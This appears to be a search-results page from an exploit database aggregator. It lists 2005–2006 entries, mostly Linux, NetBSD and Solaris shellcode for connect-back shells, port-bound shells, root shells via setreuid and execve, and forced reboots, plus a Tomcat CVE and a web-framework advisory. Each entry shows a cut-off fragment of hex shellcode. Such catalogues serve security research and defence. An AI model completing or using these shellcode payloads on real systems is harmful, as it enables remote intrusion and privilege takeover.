Lucene search
+L

3674 matches found

zdt
zdt
added 2006/01/21 12:0 a.m.17 views

linux/x86 cat /dev/urandom > /dev/console, just for kicks - 63 bytes

Exploit for linux/x86 platform in category shellcode ==================================================================== linux/x86 cat /dev/urandom /dev/console, just for kicks - 63 bytes ==================================================================== / linux/x86 cat /dev/urandom...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/01/21 12:0 a.m.27 views

linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes

linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes. Shellcode exploit for linx86 platform / linux/x86 connect-back shellcode, 127.0.0.1:31337/tcp - 74 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx...

SaveExploits0
Exploit DB
Exploit DB
added 2006/01/21 12:0 a.m.29 views

linux/x86 eject/close cd-rom loop follows /dev/cdrom symlink 45 bytes

linux/x86 eject/close cd-rom loop follows /dev/cdrom symlink 45 bytes. Shellcode exploit for linx86 platform / linux/x86 eject & close cd-rom frenzy loop follows "/dev/cdrom" symlink - 45 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51"...

SaveExploits0
Exploit DB
Exploit DB
added 2006/01/21 12:0 a.m.49 views

linux/x86 24/7 open cd-rom loop follows /dev/cdrom symlink 39 bytes

linux/x86 24/7 open cd-rom loop follows /dev/cdrom symlink 39 bytes. Shellcode exploit for linx86 platform / linux/x86 24/7 open cd-rom loop follows "/dev/cdrom" symlink - 39 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx...

0.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/01/21 12:0 a.m.38 views

linux/x86 Bind /bin/sh to 31337/tcp 80 bytes

linux/x86 Bind /bin/sh to 31337/tcp 80 bytes. Shellcode exploit for linx86 platform / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push...

0.1AI score
SaveExploits0
zdt
zdt
added 2006/01/21 12:0 a.m.23 views

linux/x86 Bind /bin/sh to 31337/tcp 80 bytes

Exploit for linux/x86 platform in category shellcode ============================================ linux/x86 Bind /bin/sh to 31337/tcp 80 bytes ============================================ / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" ...

7AI score
SaveExploits0
zdt
zdt
added 2006/01/21 12:0 a.m.16 views

linux/x86 execve(/bin/sh) / PUSH - 23 bytes

Exploit for linux/x86 platform in category shellcode =========================================== linux/x86 execve/bin/sh / PUSH - 23 bytes =========================================== / linux/x86 execve"/bin/sh", "/bin/sh", NULL / PUSH - 23 bytes - izik / char shellcode = "\x6a\x0b" // push $0xb...

7AI score
SaveExploits0
zdt
zdt
added 2006/01/21 12:0 a.m.19 views

linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes

Exploit for linux/x86 platform in category shellcode ============================================================= linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes ============================================================= / linux/x86 connect-back shellcode, 127.0.0.1:31337/tcp - ...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2006/01/21 12:0 a.m.20 views

linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes

No description provided by source. / linux/x86 connect-back shellcode, 127.0.0.1:31337/tcp - 74 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" /...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2006/01/21 12:0 a.m.21 views

linux/x86 24/7 open cd-rom loop (follows /dev/cdrom symlink) 39 bytes

No description provided by source. / linux/x86 24/7 open cd-rom loop follows "/dev/cdrom" symlink - 39 bytes - izik [email protected] / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\xb5\x08" // mov $0x8,%ch "\x68\x64\x72\x6f\x6d" // pus...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/01/21 12:0 a.m.43 views

linux/x86 reboot - 20 bytes

linux/x86 reboot - 20 bytes. Shellcode exploit for linx86 platform / linux/x86 rebootLINUXREBOOTMAGIC1, LINUXREBOOTMAGIC2, LINUXREBOOTCMDRESTART - 20 bytes - izik / char shellcode = "\x6a\x58" // push $0x58 "\x58" // pop %eax "\xbb\xad\xde\xe1\xfe" // mov $0xfee1dead,%ebx "\xb9\x69\x19\x12\x28" /...

0.1AI score
SaveExploits0
seebug.org
seebug.org
added 2006/01/21 12:0 a.m.14 views

linux/x86 getppid() + execve(/proc/pid/exe) 51 bytes

No description provided by source. / linux/x86 getppid + execve"/proc/pid/exe", "/proc/pid/exe", NULL - 51 bytes - izik [email protected] / char shellcode = "\x6a\x40" // push $0x40 "\x58" // pop %eax "\xcd\x80" // int $0x80 // // convert: // "\x4c" // dec %esp "\x99" // cltd "\x6a\x0a" // push $0xa...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/01/21 12:0 a.m.32 views

linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes

linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes. Shellcode exploit for linx86 platform / linux/x86 setreuid0, 0 + execve"/bin/sh", "/bin/sh", NULL, NULL - 31 bytes - izik / char shellcode = "\x6a\x46" // push $0x46 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx...

0.2AI score
SaveExploits0
UbuntuCve
UbuntuCve
added 2005/12/31 5:0 a.m.40 views

CVE-2005-4836

The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information...

7.8CVSS5.9AI score0.03474EPSS
SaveExploits0References1
securityvulns
securityvulns
added 2005/12/17 12:0 a.m.69 views

AWF (Adaptive Website Framework) vuln.

AWF Adaptive Website Framework vuln. Vuln. discovered by : r0t Date: 17 dec. 2005 orginal advisory:http://pridels.blogspot.com/2005/12/awf-adaptive-website-framework-vuln.html vendor:http://www.awf-cms.org affected version:2.10 and prior Product Description: AWF Adaptive Website Framework by Liqu...

0.3AI score
SaveExploits0
Exploit DB
Exploit DB
added 2005/11/30 12:0 a.m.30 views

netbsd/x86 callback shellcode port 6666 83 bytes

netbsd/x86 callback shellcode port 6666 83 bytes. Shellcode exploit for netbsdx86 platform / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, callback shellcode port 6666; / include include include char scode = "\x31\xc0" // xor %eax,%eax "\x31\xc9" // xor %ecx,%ecx "\x50" // push %eax...

SaveExploits0
seebug.org
seebug.org
added 2005/11/20 12:0 a.m.14 views

solaris/sparc portbind (port 6666) 240 bytes

No description provided by source. / [email protected] portbind shellcode full description of how it was done and defines at http://www.telegenetic.net/sparc-shellcode.htm / char shellcode= "\x9A\x1A\x40\x09" / xor %o1, %o1, %o5 / "\x90\x10\x20\x02" / mov PFINET, %o0 / "\x92\x10\x20\x02" / mo...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2005/11/20 12:0 a.m.28 views

solaris/sparc portbind port 6666 240 bytes

solaris/sparc portbind port 6666 240 bytes. Shellcode exploit for solarissparc platform / [email protected] portbind shellcode full description of how it was done and defines at http://www.telegenetic.net/sparc-shellcode.htm / char shellcode= "\x9A\x1A\x40\x09" / xor %o1, %o1, %o5 /...

SaveExploits0
zdt
zdt
added 2005/11/15 12:0 a.m.40 views

linux/PPC/x86 execve("/bin/sh",{"/bin/sh",NULL},NULL) 99 bytes

Exploit for multiple platform in category shellcode ============================================================== linux/PPC/x86 execve"/bin/sh","/bin/sh",NULL,NULL 99 bytes ============================================================== / - dual-linux.c - by email protected ripped from...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2005/11/15 12:0 a.m.54 views

linux/PPC/x86 execve"/bin/sh",{"/bin/sh",NULL},NULL 99 bytes

linux/PPC/x86 execve"/bin/sh","/bin/sh",NULL,NULL 99 bytes. Shellcode exploits for multiple platform / - dual-linux.c - by [email protected] ripped from [email protected] ^-- much , rjohnson, Kaliman, capsyl, salvia, amnesia, arcanum, eazyass, loophole, my family and so any others...

SaveExploits0
Rows per page
Query Builder